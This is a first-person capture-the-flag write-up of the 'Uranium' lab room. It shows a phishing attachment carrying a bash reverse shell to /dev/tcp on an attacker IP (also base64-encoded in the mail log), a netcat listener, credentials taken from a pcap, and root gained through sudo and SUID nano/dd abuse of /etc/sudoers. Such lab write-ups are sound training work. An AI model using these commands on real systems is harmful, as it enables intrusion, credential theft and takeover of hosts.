Uranium CTF Machine type: HARD We have reached out a account one of the employees [hakanbey](https://twitter.com/hakanbe40520689) In this room, you will learn about one of the phishing attack methods. I tried to design a phishing room (cronjobs and services) as much as I could. Special Thanks to kral4 for helping us to make this room Note: Please do not attack the given twitter account. MACHINE_IP what we are required to do: flag 1:What is the required password for the chat app? flag 2:What is the password of hakanbey user? flag 3:user_1.txt flag 4: user_2.txt flag 5:web_flag.txt flag 6:root.txt Let's kick off with nmap to get the blueprint of the system. ```┌──(stuxnet8㉿stuxnet8)-[~/Downloads] └─$ nmap -sC -sV 10.10.232.30 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 08:46 EAT Nmap scan report for 10.10.232.30 Host is up (0.37s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a1:3c:d7:e9:d0:85:40:33:d5:07:16:32:08:63:31:05 (RSA) | 256 24:81:0c:3a:91:55:a0:65:9e:36:58:71:51:13:6c:34 (ECDSA) |_ 256 c2:94:2b:0d:8e:a9:53:f6:ef:34:db:f1:43:6c:c1:7e (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: uranium, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 | ssl-cert: Subject: commonName=uranium | Subject Alternative Name: DNS:uranium | Not valid before: 2021-04-09T21:40:53 |_Not valid after: 2031-04-07T21:40:53 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Uranium Coin |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: Host: uranium; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 130.96 seconds ``` so we see three open ports 22 for ssh, 25 for SMTP(Simple Mail Transfer Protocol) this means that this was used for communication, adn port 80 for http for web services. looking through the directories ``` [08:43:06] 403 - 277B - /.htpasswd_test [08:43:31] 200 - 771B - /README.txt [08:43:32] 200 - 17KB - /LICENSE.txt [08:44:15] 301 - 313B - /assets -> http://10.10.232.30/assets/ [08:44:15] 200 - 1KB - /assets/ [08:44:55] 301 - 313B - /images -> http://10.10.232.30/images/ [08:44:55] 200 - 2KB - /images/ [08:44:57] 200 - 10KB - /index.html [08:45:43] 403 - 277B - /server-status/ [08:45:43] 403 - 277B - /server-status ``` lets look at the site  checking the source code seems to yield no profit. lets visit mentioned user hakanbey twitter account  so from the twitter account we get a domain uranium.thm. Let's add it to our /etc/hosts just for good practice ``` echo " 10.10.241.108 uranium.thm" | sudo tee /etc/hosts ``` His second cooment said that we can send him application file to his mail account which he opens and reviews them from the terminal , mmmhhh so i don't know much about sending , mail via the terminal so let go google and find out some tools that can help us : ) i find two most commonly used tools: swaks (Swaks - Swiss Army Knife SMTP) sendemail so now we have two options which we will try to send email to hakanbey but lets keep in mind he opens emails which are attachment of name application. From this we have to create a file called application and just send some stuff maybe hello ``` echo "Hello mambo vipi" > application ``` let's go with sendemail option first to see if it works ``` sendemail -t hakanbey@uranium.thm -f stuxnet8@stuxnet8.com -s uranium.thm -u "Tell me about the coins" -m "Hello" -a application -o tls=no ``` -t = to the person we want to send -f =from us -s = server and it automatically choses the default port of 25 -u= subject -m=message -a =attachement -o tls=no (tls an encryption and authentication protocol designed to secure Internet communications.) usually responsible for inializing sessions. ``` sendemail -t hakanbey@uranium.thm -f stuxnet8@stuxnet8.com -s uranium.thm -u "Tell me about the coins" -m "Hello" -a application -o tls=no Aug 22 09:41:09 stuxnet8 sendemail[18025]: Email was sent successfully! ``` cool we get a response from the server that our email was successfully sent to hakanbey. Options 2: ``` swaks --to hakanbey@uranium.thm --from stuxnet8@stuxnte8.com --header "RE:Coins" --body "I want coins" --attach application --server 10.10.232.30 ``` we get the reply ``` *** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future. Prefix filenames with '@' instead. === Trying 10.10.232.30:25... === Connected to 10.10.232.30. <- 220 uranium ESMTP Postfix (Ubuntu) -> EHLO stuxnet8 <- 250-uranium <- 250-PIPELINING <- 250-SIZE 10240000 <- 250-VRFY <- 250-ETRN <- 250-STARTTLS <- 250-ENHANCEDSTATUSCODES <- 250-8BITMIME <- 250-DSN <- 250 SMTPUTF8 -> MAIL FROM:<hakanbey@uranium.thm> <- 250 2.1.0 Ok -> RCPT TO:<hakanbey@uranium.thm> <- 250 2.1.5 Ok -> DATA <- 354 End data with <CR><LF>.<CR><LF> -> Date: Mon, 22 Aug 2022 09:42:30 +0300 -> To: hakanbey@uranium.thm -> From: stuxnet8@stuxnet8.com -> Subject: test Mon, 22 Aug 2022 09:42:30 +0300 -> Message-Id: <20220822094225.018036@stuxnet8> -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/ -> MIME-Version: 1.0 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_18036" -> RE:Coins -> -> ------=_MIME_BOUNDARY_000_18036 -> Content-Type: text/plain -> -> I want coins -> ------=_MIME_BOUNDARY_000_18036 -> Content-Type: application/octet-stream; name="application" -> Content-Description: application -> Content-Disposition: attachment; filename="application" -> Content-Transfer-Encoding: BASE64 -> -> YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjIuMTk4LzQ0NDQgMD4mMSIK -> -> ------=_MIME_BOUNDARY_000_18036-- -> -> -> . <- 250 2.0.0 Ok: queued as 5C110406A6 -> QUIT <- 221 2.0.0 Bye === Connection closed with remote host. ``` cool both work pretty fine lets put a reverse script in the application file to get reverse shell........ : ) ``` └─$ echo 'bash -c "bash -i >& /dev/tcp/10.9.2.198/4444 0>&1"' > application ``` lets open netcat on the next terminal and listen to see if we can get shell on port 4444 . And we get our shell. ``` └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.9.2.198] from (UNKNOWN) [10.10.232.30] 35680 bash: cannot set terminal process group (1785): Inappropriate ioctl for device bash: no job control in this shell hakanbey@uranium:~$ ls ls chat_with_kral4 mail_file user_1.txt ``` Since we are in we can quickly grap the user_1.txt to complete the task 3 answer ``` hakanbey@uranium:~$ cat user_1.txt cat user_1.txt thm{REDACTED} ``` let's move about the the room to see if there is another user and if yes what's his name and how do we get his creds ``` hakanbey@uranium:/$ cd /home cd /home hakanbey@uranium:/home$ ls ls hakanbey kral4 ``` cool seems like we have another user called kral4 so for now we have 2 users hakanbey and kral4 we cant get in kral4 since we don't have his creds. lets leave him alone for now. Let's go get the web flag since we know where they are stored /var/www/html ``` hakanbey@uranium:/var/www/html$ ls ls assets images index.html LICENSE.txt README.txt web_flag.txt hakanbey@uranium:/var/www/html$ cat web_flag.txt cat web_flag.txt cat: web_flag.txt: Permission denied ``` oohh oohh no permission to extract flag mmhhh, so what are we missing. Lets check the mail folder since these two have to communicate somehow ``` cat: mail_file: Is a directory hakanbey@uranium:~$ cd mail_file cd mail_file hakanbey@uranium:~/mail_file$ ls ls hakanbey@uranium:~/mail_file$ ls -la ls -la total 8 drwxrwxr-x 2 hakanbey hakanbey 4096 Aug 22 06:25 . drwxr-xr-x 7 hakanbey hakanbey 4096 May 4 2021 .. ``` we dont have mail so its ok but there seems an interesting file in the /var/log ``` hakanbey@uranium:/var$ cd log cd log hakanbey@uranium:/var/log$ ls ls alternatives.log amazon apache2 apport.log apt auth.log aws114_ssm_agent_installation.log bootstrap.log btmp cloud-init.log cloud-init-output.log dist-upgrade dpkg.log faillog hakanbey_network_log.pcap installer journal kern.log landscape lastlog mail.log openvpn syslog tallylog unattended-upgrades wtmp ``` if we look closely we can see that we have a pcap file called hakanbey_network_log.pcap. Pcap files are very interesting files to monitor since most of the times they contain important info such as creds which could be in plain text. Lets download it to our machine using python server ``` hakanbey@uranium:/var/log$ python3 -m http.server python3 -m http.server 10.9.2.198 - - [22/Aug/2022 06:33:29] "GET /hakanbey_network_log.pcap HTTP/1.1" 200 - 10.9.2.198 - - [22/Aug/2022 06:34:40] "GET /hakanbey_network_log.pcap HTTP/1.1" 200 - ``` on our machine lets get it ``` wget http://10.10.232.30:8000/hakanbey_network_log.pcap --2022-08-22 09:33:29-- http://10.10.232.30:8000/hakanbey_network_log.pcap Connecting to 10.10.232.30:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 1869 (1.8K) [application/vnd.tcpdump.pcap] Saving to: ‘hakanbey_network_log.pcap’ hakanbey_network_log.pcap 100%[=======================================================>] 1.83K 827 B/s in 2.3s 2022-08-22 09:33:32 (827 B/s) - ‘hakanbey_network_log.pcap’ saved [1869/1869] ``` Great now we have the pcap file lets monitor it.  The first packet after following tcp stream will produce the above results. MBMD1........ is the password for the chat app they are using so that's a give away. Anyways cools lets move on. So now we know the password for the chat app lets chat with kral4 he probably know our password since from the pcap he says he knows it anyways : ) let's get back in with our mail and chat with kral see what he got. So at first i thought i would just use commands ``` hakanbey@uranium:~$ ./chat_with_kral4 ./chat_with_kral4 PASSWORD :MBMD1vdpjg3kGv6SsIz56VNG kral4:hi hakanbey ->ls hakanbey:ls ? ->password hakanbey:password ? ->hi hakanbey:hi kral4:how are you? ->am good hakanbey:am good kral4:what now? did you forgot your password again ->yes i did hakanbey:yes i did kral4:okay your password is <REDACTED> don't lose it PLEASE kral4:i have to go kral4 disconnected connection terminated hakanbey@uranium:~$ exit ``` So at first i thought i would just use commands that's why you see me use the ls command  so i politely asked kral4 for my password and he gave it to me Cool that would help you answer second question. we can now ssh into hakanbey since we have his cred ``` ──(stuxnet8㉿stuxnet8)-[~/Downloads] └─$ ssh hakanbey@uranium.thm hakanbey@uranium.thm's password: Permission denied, please try again. hakanbey@uranium.thm's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Aug 22 06:50:28 UTC 2022 System load: 0.0 Memory usage: 38% Processes: 112 Usage of /: 46.8% of 8.79GB Swap usage: 0% Users logged in: 0 => There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 14 updates can be applied immediately. To see these additional updates run: apt list --upgradable No mail. Last login: Thu May 6 13:50:11 2021 from 192.168.1.108 hakanbey@uranium:~$ ``` What can hakanbey run as supper user sudo ``` hakanbey@uranium:~$ sudo -l [sudo] password for hakanbey: Matching Defaults entries for hakanbey on uranium: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hakanbey may run the following commands on uranium: (kral4) /bin/bash ``` wait what ...... that's pretty cool lets just so the following command does the magic ``` hakanbey@uranium:~$ sudo -u kral4 /bin/bash ``` let's get the user2 flag ASAP ``` kral4@uranium:/home/kral4$ ls chat_with_hakanbey user_2.txt kral4@uranium:/home/kral4$ cat user_2.txt thm{REDACTED} ``` Heading into the the mail_log to see if we have any mail as user kral4 ``` kral4@uranium:/var/mail$ cat kral4 From root@uranium.thm Sat Apr 24 13:22:02 2021 Return-Path: <root@uranium.thm> X-Original-To: kral4@uranium.thm Delivered-To: kral4@uranium.thm Received: from uranium (localhost [127.0.0.1]) by uranium (Postfix) with ESMTP id C7533401C2 for <kral4@uranium.thm>; Sat, 24 Apr 2021 13:22:02 +0000 (UTC) Message-ID: <841530.943147035-sendEmail@uranium> From: "root@uranium.thm" <root@uranium.thm> To: "kral4@uranium.thm" <kral4@uranium.thm> Subject: Hi Kral4 Date: Sat, 24 Apr 2021 13:22:02 +0000 X-Mailer: sendEmail-1.56 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-992935.514616878" This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program. ------MIME delimiter for sendEmail-992935.514616878 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I give SUID to the nano file in your home folder to fix the attack on our index.html. Keep the nano there, in case it happens again. ------MIME delimiter for sendEmail-992935.514616878-- ``` so seems like he gave SUID to nano file to fix some sort of attack in index.html , mmmhhh interesting well lets try getting the webflag ``` kral4@uranium:/var/www/html$ ls assets images index.html LICENSE.txt README.txt web_flag.txt kral4@uranium:/var/www/html$ cat web_flag.txt cat: web_flag.txt: Permission denied ```  This was now getting into my nerves....... ok what are we missing ok lets see if we can try and change the home page (index.html). Being honest i didnt think it was going to work but i had to try it out since i saw SUID on index.html from the root user mail so i did some googling and i found out about file Write, file read, SUID and SUDO . So apparently what this means is If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. lets try it out ``` echo "This site is hacked by stuxnet8" | ./dd of=index.html ``` ``` kral4@uranium:/var/www/html$ echo "This site is hacked by stuxnet8" | /bin/dd of=index.html 0+1 records in 0+1 records out 6 bytes copied, 0.000608526 s, 9.9 kB/s You have new mail in /var/mail/kral4 ``` oohh we have to vist the index.html page to see if it changed andonce you go there and refresh we can see that we finnaly have acces to this site index.html page awesome! Plus we get new email lets see what it says. ``` hakanbey kral4 kral4@uranium:/var/mail$ cat kral4 From root@uranium.thm Sat Apr 24 13:22:02 2021 Return-Path: <root@uranium.thm> X-Original-To: kral4@uranium.thm Delivered-To: kral4@uranium.thm Received: from uranium (localhost [127.0.0.1]) by uranium (Postfix) with ESMTP id C7533401C2 for <kral4@uranium.thm>; Sat, 24 Apr 2021 13:22:02 +0000 (UTC) Message-ID: <841530.943147035-sendEmail@uranium> From: "root@uranium.thm" <root@uranium.thm> To: "kral4@uranium.thm" <kral4@uranium.thm> Subject: Hi Kral4 Date: Sat, 24 Apr 2021 13:22:02 +0000 X-Mailer: sendEmail-1.56 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-992935.514616878" This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program. ------MIME delimiter for sendEmail-992935.514616878 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I give SUID to the nano file in your home folder to fix the attack on our index.html. Keep the nano there, in case it happens again. ------MIME delimiter for sendEmail-992935.514616878-- From root@uranium.thm Mon Aug 22 07:04:40 2022 Return-Path: <root@uranium.thm> X-Original-To: kral4@uranium.thm Delivered-To: kral4@uranium.thm Received: from uranium (localhost [127.0.0.1]) by uranium (Postfix) with ESMTP id 219EE40616 for <kral4@uranium.thm>; Mon, 22 Aug 2022 07:04:40 +0000 (UTC) Message-ID: <808219.703703315-sendEmail@uranium> From: "root@uranium.thm" <root@uranium.thm> To: "kral4@uranium.thm" <kral4@uranium.thm> Subject: Hi Kral4 Date: Mon, 22 Aug 2022 07:04:40 +0000 X-Mailer: sendEmail-1.56 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-65705.4070188714" This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program. ------MIME delimiter for sendEmail-65705.4070188714 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I think our index page has been hacked again. You know how to fix it, I am giving authorization. ------MIME delimiter for sendEmail-65705.4070188714-- ``` oopps they noticed that we hacked there index page so they give kral4 the authorization to run what.........? ``` kral4@uranium:/var/mail$ cd /home/kral4 kral4@uranium:/home/kral4$ ls chat_with_hakanbey nano user_2.txt ``` it seems like we have permission to execute nano file. So recently i was studying for my linux exam and there was question to do with adding people into the sudoers file and giving them permissions to exute certain commands or all commands as supper user sudoers(group). So i thought about giving it a try to see if its possible to assign my self all prividges since i had the cred of hakanbey  ``` kral4@uranium:/etc$ cd /home/kral4 kral4@uranium:/home/kral4$ ./nano /etc/sudoers kral4@uranium:/home/kral4$ exit exit hakanbey@uranium:~$ sudo su [sudo] password for hakanbey: root@uranium:/home/hakanbey# cd /root root@uranium:~# ls htmlcheck.py root.txt root@uranium:~# cat root.txt thm{REDACTED} ``` And we are now root awesome we can place the root flag in to get our points so now the web flag is last mmmhhh that easy then since we are root /var/www/html/ ``` root@uranium:/var/www/html# cat web_flag.txt thm{REDACTED} ``` And we are done with the room. My opinion on the room is that this was an easy room but very tricky and needed attention on each and everything you do so yes i enjoyed it.